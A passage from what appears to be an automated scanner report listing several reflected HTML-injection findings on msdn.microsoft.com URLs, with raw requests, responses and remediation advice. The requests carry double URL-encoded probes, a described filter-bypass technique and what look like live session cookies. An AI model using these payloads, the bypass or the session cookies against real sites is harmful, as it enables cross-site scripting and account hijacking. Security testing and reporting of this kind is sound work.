HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9223
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:13:41 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/libraryd55f6"><a>fdd48321b4d/dd582938(v=office.11" />
...[SNIP]...

2.65. http://msdn.microsoft.com/en-us/library/dd582938(v=office.11 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://msdn.microsoft.com
Path:   /en-us/library/dd582938(v=office.11

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6e49d%2522%253e%253ca%253e35d14fe12fc was submitted in the REST URL parameter 3. This input was echoed as 6e49d"><a>35d14fe12fc in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en-us/library/dd582938(v6e49d%2522%253e%253ca%253e35d14fe12fc=office.11 HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=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&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9223
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:13:51 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library/dd582938(v6e49d"><a>35d14fe12fc=office.11" />
...[SNIP]...

2.66. http://msdn.microsoft.com/en-us/library/dd582938(v=office.11).aspx [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://msdn.microsoft.com
Path:   /en-us/library/dd582938(v=office.11).aspx

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c8440%2522%253e%253ca%253e0f47febd4eb was submitted in the REST URL parameter 1. This input was echoed as c8440"><a>0f47febd4eb in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en-usc8440%2522%253e%253ca%253e0f47febd4eb/library/dd582938(v=office.11).aspx HTTP/1.1
Host: msdn.microsoft.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MUID=34AD5BBBF6FC477CAC5139C76AA247F9; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; mcI=Sat, 06 Nov 2010 18:51:25 GMT; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=116E8h002j20101; ixpLightBrowser=1; viewkey=loband; __qca=P0-1185849018-1290642834531; __unam=289c965-12c804ebf38-f510776-6; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 17:57:22 GMT
Content-Length: 9200

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-usc8440"><a>0f47febd4eb/library/dd582938(v=office.11)" />
...[SNIP]...

2.67. http://msdn.microsoft.com/en-us/library/dd582938(v=office.11).aspx [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://msdn.microsoft.com
Path:   /en-us/library/dd582938(v=office.11).aspx

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload efc86%2522%253e%253ca%253e3e864514c0b was submitted in the REST URL parameter 2. This input was echoed as efc86"><a>3e864514c0b in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en-us/libraryefc86%2522%253e%253ca%253e3e864514c0b/dd582938(v=office.11).aspx HTTP/1.1
Host: msdn.microsoft.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MUID=34AD5BBBF6FC477CAC5139C76AA247F9; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; mcI=Sat, 06 Nov 2010 18:51:25 GMT; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=116E8h002j20101; ixpLightBrowser=1; viewkey=loband; __qca=P0-1185849018-1290642834531; __unam=289c965-12c804ebf38-f510776-6; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 17:57:54 GMT
Content-Length: 9200

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/libraryefc86"><a>3e864514c0b/dd582938(v=office.11)" />
...[SNIP]...

2.68. http://msdn.microsoft.com/en-us/library/dd582938(v=office.11).aspx [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://msdn.microsoft.com
Path:   /en-us/library/dd582938(v=office.11).aspx

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 14105%2522%253e%253ca%253e4aaafa655d was submitted in the REST URL parameter 3. This input was echoed as 14105"><a>4aaafa655d in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en-us/library/dd582938(v14105%2522%253e%253ca%253e4aaafa655d=office.11).aspx HTTP/1.1
Host: msdn.microsoft.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MUID=34AD5BBBF6FC477CAC5139C76AA247F9; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; mcI=Sat, 06 Nov 2010 18:51:25 GMT; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=116E8h002j20101; ixpLightBrowser=1; viewkey=loband; __qca=P0-1185849018-1290642834531; __unam=289c965-12c804ebf38-f510776-6; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 17:58:24 GMT
Content-Length: 9198

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library/dd582938(v14105"><a>4aaafa655d=office.11)" />
...[SNIP]...

2.69. http://msdn.microsoft.com/en-us/library/dd582939(office.11 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://msdn.microsoft.com
Path:   /en-us/library/dd582939(office.11

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload edda6%2522%253e%253ca%253e6e9b407ad3c was submitted in the REST URL parameter 1. This input was echoed as edda6"><a>6e9b407ad3c in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en-usedda6%2522%253e%253ca%253e6e9b407ad3c/library/dd582939(office.11 HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=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&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9219
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:14:17 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-usedda6"><a>6e9b407ad3c/library/dd582939(office.11" />
...[SNIP]...

2.70. http://msdn.microsoft.com/en-us/library/dd582939(office.11 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://msdn.microsoft.com
Path:   /en-us/library/dd582939(office.11

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a0c3e%2522%253e%253ca%253e86fe33f7661 was submitted in the REST URL parameter 2. This input was echoed as a0c3e"><a>86fe33f7661 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en-us/librarya0c3e%2522%253e%253ca%253e86fe33f7661/dd582939(office.11 HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=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&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9219
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:14:33 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/librarya0c3e"><a>86fe33f7661/dd582939(office.11" />
...[SNIP]...

2.71. http://msdn.microsoft.com/en-us/library/dd582939(office.11 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://msdn.microsoft.com
Path:   /en-us/library/dd582939(office.11

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e1089%2522%253e%253ca%253e1aa87e60d4f was submitted in the REST URL parameter 3. This input was echoed as e1089"><a>1aa87e60d4f in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en-us/library/dd582939(office.11e1089%2522%253e%253ca%253e1aa87e60d4f HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=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&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; 